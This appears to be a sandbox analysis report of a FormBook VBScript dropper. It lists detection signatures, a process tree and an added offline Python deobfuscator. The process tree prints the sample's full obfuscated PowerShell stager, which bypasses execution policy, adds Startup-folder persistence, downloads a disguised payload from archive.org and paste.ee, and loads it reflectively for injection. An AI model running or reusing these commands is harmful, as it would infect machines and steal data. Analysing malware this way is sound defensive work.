Windows Analysis Report
Logistics1.vbs
Overview
General Information
Detection
FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Process Tree
- System is w10x64
- wscript.exe (PID: 7540 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 7632 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 7680 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
- powershell.exe (PID: 7792 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 7892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ=='; $OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- appidtel.exe (PID: 5484 cmdline: "C:\Windows\SysWOW64\appidtel.exe" MD5: 2C04FB942B2735073D75063E9FFBF50C)
- appidtel.exe (PID: 7224 cmdline: "C:\Windows\SysWOW64\appidtel.exe" MD5: 2C04FB942B2735073D75063E9FFBF50C)
- cleanup
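The PID 7892 and PID 8004 command lines in the tree are three obfuscation layers stacked on each other: $Codigo is plain base64 of the next script; that script is a single-quoted template split with '+' and run through -f [CHAR]39,[CHAR]36, so every {0} becomes a single quote and every {1} becomes $; and the result is piped into .( ([string]$VerbosePreference)[1,3]+'x' -join '' ), which spells the alias iex from the default value SilentlyContinue. The Python below is an added example for this report, not code from the sample, from Joe Sandbox or from any tool the report names. It takes the PID 8004 argument copied from the tree as constructed input, unwraps the layers offline as text (nothing is downloaded, loaded or invoked), and pulls out the download URL, the <<BASE64_START>>/<<BASE64_END>> markers the stager searches for, the [dnlib.IO.Home]::VAI entry point, and the arguments handed to it, un-reversing the first one, which is a paste.ee URL written backwards. The last VAI argument, appidtel, lines up with the two appidtel.exe processes the tree shows. The regular expressions and function names are this example's own.

```python
"""Offline unwrapping of the PowerShell stager recorded in the process tree (PIDs 7892/8004).

Added example for this report, not code from the sample or from Joe Sandbox. Nothing is
downloaded, loaded or invoked: every layer is handled as text and the indicators are
printed at the end.
"""
import base64
import re

# Constructed input: the argument PID 8004 received via -command, copied from the process
# tree above without the cmdline's outer double quotes. The {0}/{1} placeholders and the
# '+' string splits are the sample's own obfuscation.
STAGER = (
    "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/"
    "DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = "
    "{1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8."
    "GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag"
    " = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex"
    " = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt "
    "{1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - "
    "{1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, "
    "{1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command"
    ");{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod"
    " = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/"
    "ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, "
    "{0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]"
    "$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"
)


def split_stager(stager):
    """Separate the (('template') -f [CHAR]a,[CHAR]b) part from the piped invoker."""
    m = re.fullmatch(
        r"\(\('(?P<template>.*)'\)\s*-f\s*(?P<args>\[CHAR\]\d+(?:,\[CHAR\]\d+)*)\)"
        r"\|\.\((?P<invoker>.*)\)",
        stager,
        re.IGNORECASE | re.DOTALL,
    )
    if m is None:
        raise ValueError("stager does not have the (('...') -f ...)|.(...) shape")
    return m.group("template"), m.group("args"), m.group("invoker")


def powershell_format(template, fmt_args):
    """Emulate PowerShell: '+' concatenation runs first, then -f substitutes {n}."""
    values = [chr(int(n)) for n in re.findall(r"\[CHAR\](\d+)", fmt_args, re.IGNORECASE)]
    joined = template.replace("'+'", "")
    return re.sub(r"\{(\d+)\}", lambda m: values[int(m.group(1))], joined)


def resolve_invoker(invoker, verbose_preference="SilentlyContinue"):
    """Evaluate ([string]$VerbosePreference)[i,j]+'x' -join '' the way PowerShell does.

    $VerbosePreference defaults to 'SilentlyContinue', so indexes 1 and 3 yield 'i' and 'e';
    with the literal 'x' appended, the call operator .( ... ) receives the alias iex.
    """
    m = re.search(r"\$verbosepreference\)\[([\d,]+)\]\+'([^']*)'", invoker, re.IGNORECASE)
    if m is None:
        raise ValueError("unrecognised invoker expression")
    picked = "".join(verbose_preference[int(i)] for i in m.group(1).split(","))
    return picked + m.group(2)


def extract_iocs(script):
    """Pull indicators from the deobfuscated script; a reversed URL is flipped back."""
    url = re.search(r"\$imageUrl = '([^']*)'", script).group(1).strip()
    start_flag = re.search(r"\$startFlag = '([^']*)'", script).group(1)
    end_flag = re.search(r"\$endFlag = '([^']*)'", script).group(1)
    entry = re.search(r"\[([\w.]+)\]\.GetMethod\('(\w+)'\)", script)
    raw_args = re.search(r"\.Invoke\(\$null, @\((.*?)\)\)", script).group(1)
    args = re.findall(r"'([^']*)'", raw_args)
    # The first argument is stored backwards ("...ee.etsap//:sptth"); "desativado" is
    # Portuguese for "disabled"; the last argument names the host process (appidtel).
    args = [a[::-1] if "//:" in a else a for a in args]
    return {
        "stage_url": url,
        "start_flag": start_flag,
        "end_flag": end_flag,
        "entry_point": f"{entry.group(1)}::{entry.group(2)}",
        "vai_args": args,
    }


def decode_codigo(b64):
    """Stage 1 (PID 7892): $Codigo is ordinary base64 of UTF-8 text."""
    return base64.b64decode(b64).decode("utf-8")


def deobfuscate(stager):
    """Run all layers and return the invoker alias, the clear script and its indicators."""
    template, fmt_args, invoker = split_stager(stager)
    script = powershell_format(template, fmt_args)
    return {"invoker": resolve_invoker(invoker), "script": script, "iocs": extract_iocs(script)}


if __name__ == "__main__":
    result = deobfuscate(STAGER)
    print("piped into:", result["invoker"])
    print(result["script"])
    for key, value in result["iocs"].items():
        print(f"{key}: {value}")
```

To start one layer earlier, feed the $Codigo value from the PID 7892 line to decode_codigo(); its output is the PID 8004 argument and goes straight into deobfuscate(). The script deliberately only emulates the two PowerShell behaviours this sample relies on (string concatenation before -f, and array indexing into $VerbosePreference), so a stager that uses other -f features or a different invoker would raise rather than silently produce a wrong result.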
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | 
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | 
System Summary
Source: | Author: Florian Roth (Nextron Systems): |